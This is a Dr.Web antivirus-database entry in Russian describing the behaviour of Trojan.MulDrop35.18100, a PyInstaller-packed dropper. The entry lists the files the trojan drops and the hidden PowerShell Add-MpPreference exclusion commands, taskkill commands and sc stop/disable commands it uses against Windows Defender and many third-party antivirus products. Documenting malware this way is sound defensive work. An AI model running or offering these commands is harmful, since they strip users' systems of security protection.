Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.MulDrop35.18100

Добавлен в вирусную базу Dr.Web: 2026-01-16

Описание добавлено:

Техническая информация

Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '<Полный путь к файлу>'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess '<Имя файла>.exe'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%APPDATA%'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.dll'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.scr'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.exe'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%HOMEPATH%'"
Запускает на исполнение
  • '<SYSTEM32>\taskkill.exe' /F /IM MpCmdRun.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM NisSrv.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SgrmBroker.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SenseCncProxy.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM MsMpEng.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SenseSampleUploader.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM smartscreen.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SecurityHealthService.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM MpDlpService.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SenseIR.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM avgwdsvc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM ccSvcHst.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM mfemms.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM avgidsagent.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM vsserv.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM ksdeui.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM bdredline.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM AvastEmUpdate.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SophosUI.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM kavtray.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM avpui.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM ksde.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM aswToolsSvc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM mbamtray.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM NortonSecurity.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM MBAMWsc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM swi_service.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM mfefire.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM mfevtp.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM bdwtxag.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM updatesrv.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM AVGSvc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM mbamservice.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM avgui.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM klnagent.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM eguiProxy.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SophosHealth.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM Norton_WSC.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM ModuleCoreService.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM klwtblfs.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SecurityHealthSystray.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM mfewc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM aswidsagent.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM TmListen.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM avp.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM PccNTMon.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM bdagent.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM AvastUI.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM McAPExe.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM bdservicehost.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM nsWscSvc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM PSUAService.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM egui.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM AvastSvc.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM SAVService.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM cmdagent.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM ekrn.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM a2guard.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM a2service.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM fsguiexe.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM AVK.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM zlclient.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM PSANHost.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM WRSkyClient.exe /T
  • '<SYSTEM32>\taskkill.exe' /F /IM AVKWCtl.exe /T
Запускает большое число процессов
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\_mei14002\crypto\cipher\_arc4.pyd
  • %TEMP%\_mei14002\crypto\cipher\_salsa20.pyd
  • %TEMP%\_mei14002\crypto\cipher\_chacha20.pyd
  • %TEMP%\_mei14002\crypto\cipher\_pkcs1_decode.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_aes.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_aesni.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_arc2.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_blowfish.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_cast.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_cbc.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_cfb.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_ctr.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_des.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_des3.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_ecb.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_eksblowfish.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_ocb.pyd
  • %TEMP%\_mei14002\crypto\cipher\_raw_ofb.pyd
  • %TEMP%\_mei14002\crypto\hash\_blake2b.pyd
  • %TEMP%\_mei14002\crypto\hash\_blake2s.pyd
  • %TEMP%\_mei14002\crypto\hash\_md2.pyd
  • %TEMP%\_mei14002\crypto\hash\_md4.pyd
  • %TEMP%\_mei14002\crypto\hash\_md5.pyd
  • %TEMP%\_mei14002\crypto\hash\_ripemd160.pyd
  • %TEMP%\_mei14002\crypto\hash\_sha1.pyd
  • %TEMP%\_mei14002\crypto\hash\_sha224.pyd
  • %TEMP%\_mei14002\crypto\hash\_sha256.pyd
  • %TEMP%\_mei14002\crypto\hash\_sha384.pyd
  • %TEMP%\_mei14002\crypto\hash\_sha512.pyd
  • %TEMP%\_mei14002\crypto\hash\_ghash_clmul.pyd
  • %TEMP%\_mei14002\crypto\hash\_ghash_portable.pyd
  • %TEMP%\_mei14002\crypto\hash\_keccak.pyd
  • %TEMP%\_mei14002\crypto\hash\_poly1305.pyd
  • %TEMP%\_mei14002\crypto\math\_modexp.pyd
  • %TEMP%\_mei14002\crypto\protocol\_scrypt.pyd
  • %TEMP%\_mei14002\crypto\publickey\_curve25519.pyd
  • %TEMP%\_mei14002\crypto\publickey\_curve448.pyd
  • %TEMP%\_mei14002\crypto\publickey\_ec_ws.pyd
  • %TEMP%\_mei14002\crypto\publickey\_ed25519.pyd
  • %TEMP%\_mei14002\crypto\publickey\_ed448.pyd
  • %TEMP%\_mei14002\crypto\util\_cpuid_c.pyd
  • %TEMP%\_mei14002\crypto\util\_strxor.pyd
  • %TEMP%\_mei14002\vcruntime140.dll
  • %TEMP%\_mei14002\vcruntime140_1.dll
  • %TEMP%\_mei14002\_asyncio.pyd
  • %TEMP%\_mei14002\_bz2.pyd
  • %TEMP%\_mei14002\_ctypes.pyd
  • %TEMP%\_mei14002\_decimal.pyd
  • %TEMP%\_mei14002\_hashlib.pyd
  • %TEMP%\_mei14002\_lzma.pyd
  • %TEMP%\_mei14002\_multiprocessing.pyd
  • %TEMP%\_mei14002\_overlapped.pyd
  • %TEMP%\_mei14002\_queue.pyd
  • %TEMP%\_mei14002\_socket.pyd
  • %TEMP%\_mei14002\_sqlite3.pyd
  • %TEMP%\_mei14002\_ssl.pyd
  • %TEMP%\_mei14002\_wmi.pyd
  • %TEMP%\_mei14002\api-ms-win-core-console-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-datetime-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-debug-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-errorhandling-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-fibers-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-file-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-file-l1-2-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-file-l2-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-handle-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-heap-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-interlocked-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-libraryloader-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-localization-l1-2-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-memory-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-namedpipe-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-processenvironment-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-processthreads-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-processthreads-l1-1-1.dll
  • %TEMP%\_mei14002\api-ms-win-core-profile-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-rtlsupport-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-string-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-synch-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-synch-l1-2-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-sysinfo-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-timezone-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-core-util-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-conio-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-convert-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-environment-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-filesystem-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-heap-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-locale-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-math-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-process-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-runtime-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-stdio-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-string-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-time-l1-1-0.dll
  • %TEMP%\_mei14002\api-ms-win-crt-utility-l1-1-0.dll
  • %TEMP%\_mei14002\base_library.zip
  • %TEMP%\_mei14002\libcrypto-3.dll
  • %TEMP%\_mei14002\libffi-8.dll
  • %TEMP%\_mei14002\libssl-3.dll
  • %TEMP%\_mei14002\pyexpat.pyd
  • %TEMP%\_mei14002\python313.dll
  • %TEMP%\_mei14002\rar.exe
  • %TEMP%\_mei14002\rarreg.key
  • %TEMP%\_mei14002\select.pyd
  • %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
  • %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
  • %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
  • %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
  • %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
  • %TEMP%\_mei14002\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
  • %TEMP%\_mei14002\setuptools\_vendor\jaraco\text\lorem ipsum.txt
  • %TEMP%\_mei14002\sonic.aes
  • %TEMP%\_mei14002\sqlite3.dll
  • %TEMP%\_mei14002\ucrtbase.dll
  • %TEMP%\_mei14002\unicodedata.pyd
  • nul
Сетевая активность
UDP
  • DNS ASK gs##tic.com
Другое
Ищет следующие окна
  • ClassName: '' WindowName: ''
Перезапускает анализируемый образец
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '<Полный путь к файлу>'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess '<Имя файла>.exe'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%TEMP%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%APPDATA%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.exe'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.dll'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionExtension '.scr'"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MsMpEng.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MpCmdRun.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM NisSrv.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SecurityHealthService.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SecurityHealthSystray.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM smartscreen.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MpDlpService.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SgrmBroker.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseIR.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseCncProxy.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SenseSampleUploader.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastSvc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastUI.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM aswidsagent.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM aswToolsSvc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AvastEmUpdate.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVGSvc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgui.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgidsagent.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avgwdsvc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avp.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM avpui.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM kavtray.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM klnagent.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM klwtblfs.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ksde.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ksdeui.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdagent.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdservicehost.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdredline.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM bdwtxag.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM vsserv.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM updatesrv.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM NortonSecurity.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM nsWscSvc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM Norton_WSC.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ccSvcHst.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM McAPExe.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfemms.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfevtp.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfefire.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mfewc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ModuleCoreService.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mbamservice.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM mbamtray.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM MBAMWsc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM ekrn.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM egui.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM eguiProxy.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SophosHealth.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SophosUI.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM SAVService.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM swi_service.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PccNTMon.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TMBMSRV.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TMBMServer.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TmListen.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM TmProxy.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cmdagent.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cfp.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM cis.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM WRSA.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM WRSkyClient.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSANHost.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSKMAD.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM PSUAService.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fshoster32.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fsguiexe.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM fssm32.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVK.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVKWCtl.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM AVKProxy.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM a2service.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM a2guard.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM zlclient.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM vsmon.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "taskkill /F /IM wscsvc.exe /T" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "WinDefend"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "WinDefend" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "WdNisSvc"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "WdNisSvc" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "Sense"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "Sense" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "wscsvc"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "wscsvc" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "SecurityHealthService"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "SecurityHealthService" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "avast! Antivirus"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "avast! Antivirus" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "aswbIDSAgent"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "aswbIDSAgent" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "AvastWscReporter"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "AvastWscReporter" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "AVG Antivirus"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "AVG Antivirus" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "avgfws"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "avgfws" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "avgwd"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "AVP18.0.0" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "AVP18.0.0"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "avgwd" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "klim6"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "klim6" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "KLIF"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "KLIF" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "bdredline"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "bdredline" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "VSSERV"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "VSSERV" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "bdagent"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "bdagent" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "Norton Security"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "Norton Security" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "NS"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "NS" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "McAfee McShield"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "McAfee McShield" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "mfevtp"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "mfevtp" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "mfefire"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "mfefire" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "MBAMService"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "MBAMService" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "mbamwsc"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "mbamwsc" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "ekrn"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "ekrn" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "epfw"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "epfw" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "epfwwfp"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "epfwwfp" start= disabled" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc stop "Sophos Agent"" (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c "sc config "Sophos Agent" start= disabled" (со скрытым окном)
